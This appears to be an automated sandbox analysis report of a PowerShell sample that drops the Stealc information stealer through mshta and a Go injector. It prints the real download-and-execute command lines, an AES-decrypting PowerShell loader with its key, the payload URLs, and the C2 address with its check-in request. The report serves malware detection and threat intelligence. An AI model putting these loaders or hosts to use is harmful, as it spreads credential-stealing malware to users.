Windows Analysis Report
verification.b-cdn.net.ps1

Overview

General Information

Sample name: verification.b-cdn.net.ps1
Analysis ID: 1491044
MD5: 4c99ba8c0fcf994162c991b2b6601509
SHA1: 4790b36cdbbededed079473ff1c5c34637f2a2f6
SHA256: 8d80e5c7d07aef7d4565f4ddc61d3fc5819a5ea68f2d5282e6ae3e5e17d60e3d
Tags: ps1

Detection

Go Injector, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Go Injector
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 7172 cmdline: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 7336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('…');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 0SmartAssem.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Roaming\0SmartAssem.exe" MD5: 517C4A0A27D1C022A3319AF316407810)
            • BitLockerToGo.exe (PID: 7916 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://193.176.153.234/587ec30955d49a9c.php"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\0SmartAssem.exe | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security |

Source | Rule | Description | Author | Strings
00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security |
00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security |
Process Memory Space: powershell.exe PID: 7336 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |

Source | Rule | Description | Author | Strings
8.2.0SmartAssem.exe.7ff74ca60000.8.unpack | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security |
8.0.0SmartAssem.exe.7ff74ca60000.0.unpack | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7336.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |

              System Summary

              Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, CommandLine: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4108, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, ProcessId: 7172, ProcessName: mshta.exe
              Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('…');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -spl
              Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ProcessId: 4108, ProcessName: powershell.exe
              Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ProcessId: 7100, ProcessName: powershell.exe
              Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7336, TargetFilename: C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dll
              Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ProcessId: 4108, ProcessName: powershell.exe
              Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ProcessId: 7100, ProcessName: powershell.exe
              Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7256, ProcessName: svchost.exe

              Timestamp: 2024-08-10T19:10:37.251997+0200
              SID: 2044243
              Severity: 1
              Source Port: 49743
              Destination Port: 80
              Protocol: TCP
              Classtype: Malware Command and Control Activity Detected

              Timestamp: 2024-08-10T19:10:02.529769+0200
              SID: 2026434
              Severity: 1
              Source Port: 443
              Destination Port: 49730
              Protocol: TCP
              Classtype: A Network Trojan was detected

              AV Detection

              Source: https://bidvertiser.b-cdn.net/smart1.zip | Avira URL Cloud: Label: malware
              Source: https://bidvertiser.b-cdn.net/smart1 | Avira URL Cloud: Label: malware
              Source: https://bidvertiser.b-cdn.net/smart1... | Avira URL Cloud: Label: malware
              Source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://193.176.153.234/587ec30955d49a9c.php"}
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1] | ReversingLabs: Detection: 39%
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1] | Virustotal: Detection: 28%
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe | ReversingLabs: Detection: 18%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
              Source: unknown | HTTPS traffic detected: 185.93.1.250:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 185.93.1.250:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb00 source: Qt5SqlVBox.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSharedClipboard\VBoxSharedClipboard.pdb source: VBoxSharedClipboard.dll.5.dr
              Source: Binary string: dialer.pdbGCTL source: mshta.exe, smart1[1].3.dr
              Source: Binary string: BitLockerToGo.pdb source: 0SmartAssem.exe, 00000008.00000003.1981482070.0000022BEFA80000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000003.1981404969.0000022BEFD30000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000002.1998133835.000000C0004BB000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5PrintSupportVBox.pdb22 source: Qt5PrintSupportVBox.dll.5.dr
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5PrintSupportVBox.pdb source: Qt5PrintSupportVBox.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSharedFolders\VBoxSharedFolders.pdb source: VBoxSharedFolders.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSupLib\VBoxSupLib.pdb source: VBoxSupLib.dll.5.dr
              Source: Binary string: dialer.pdb source: mshta.exe, smart1[1].3.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: 0SmartAssem.exe, 00000008.00000003.1981482070.0000022BEFA80000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000003.1981404969.0000022BEFD30000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000002.1998133835.000000C0004BB000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb source: Qt5SqlVBox.dll.5.dr
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

              Networking

              Source: Malware configuration extractor | URLs: http://193.176.153.234/587ec30955d49a9c.php
              Source: global traffic | HTTP traffic detected:
                  GET /smart1.zip HTTP/1.1
                  Host: bidvertiser.b-cdn.net
                  Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected:
                  GET / HTTP/1.1
                  Host: 193.176.153.234
                  Connection: Keep-Alive
                  Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected:
                  POST /587ec30955d49a9c.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
                  Host: 193.176.153.234
                  Content-Length: 210
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Data Ascii:
                  ------BGHJJDGHCBGDHIECBGID
                  Content-Disposition: form-data; name="hwid"

                  27ED3C190AC22312027626
                  ------BGHJJDGHCBGDHIECBGID
                  Content-Disposition: form-data; name="build"

                  cr3
                  ------BGHJJDGHCBGDHIECBGID--
              Source: Joe Sandbox View | IP Address: 185.93.1.250
              Source: Joe Sandbox View | ASN Name: AGROSVITUA
              Source: Joe Sandbox View | ASN Name: CDN77GB
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global traffic | HTTP traffic detected:
                  GET /smart1 HTTP/1.1
                  Accept: */*
                  Accept-Language: en-CH
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: bidvertiser.b-cdn.net
                  Connection: Keep-Alive
              Source: unknown | TCP traffic detected without corresponding DNS query: 193.176.153.234
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_030562D0 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,11_2_030562D0
              Source: global trafficHTTP traffic detected: GET /smart1 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bidvertiser.b-cdn.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /smart1.zip HTTP/1.1Host: bidvertiser.b-cdn.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.176.153.234Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: bidvertiser.b-cdn.net
              Source: unknownHTTP traffic detected: POST /587ec30955d49a9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDHost: 193.176.153.234Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 45 44 33 43 31 39 30 41 43 32 32 33 31 32 30 32 37 36 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 2d 2d 0d 0a Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="hwid"27ED3C190AC22312027626------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build"cr3------BGHJJDGHCBGDHIECBGID--
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49743 -> 193.176.153.234:80
              Source: Network trafficSuricata IDS: 2026434 - Severity 1 - ET MALWARE VBScript Redirect Style Exe File Download : 185.93.1.250:443 -> 192.168.2.4:49730
              Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknown HTTPS traffic detected: 185.93.1.250:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 185.93.1.250:443 -> 192.168.2.4:49734 version: TLS 1.2

              System Summary

              Source: amsi64_7336.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: Process Memory Space: powershell.exe PID: 7336, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VBoxSharedFolders.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VBoxSharedClipboard.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VBoxVMM.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Qt5SqlVBox.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\0SmartAssem.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VBoxSupLib.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dll
              Source: C:\Windows\System32\mshta.exe Process created: Commandline size = 2846
              Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\VBoxSupLib.dll 34E8BD19A7DD241A1275A3CF77A8A59A7DF1FC529F864F92D8548CC7E0429B26
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 03054610 appears 316 times
              Source: 0SmartAssem.exe.5.dr Static PE information: Number of sections : 12 > 10
              Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: amsi64_7336.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: Process Memory Space: powershell.exe PID: 7336, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.evad.winPS1@14/24@1/3
              Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0il2ydi0.us5.ps1
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeFile opened: C:\Windows\system32\964037318f685c834d06cfa22067553aaf5b5ab6fc15b851def7dafa67127db2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: 0SmartAssem.exe String found in binary or memory: net/addrselect.go
              Source: 0SmartAssem.exe String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
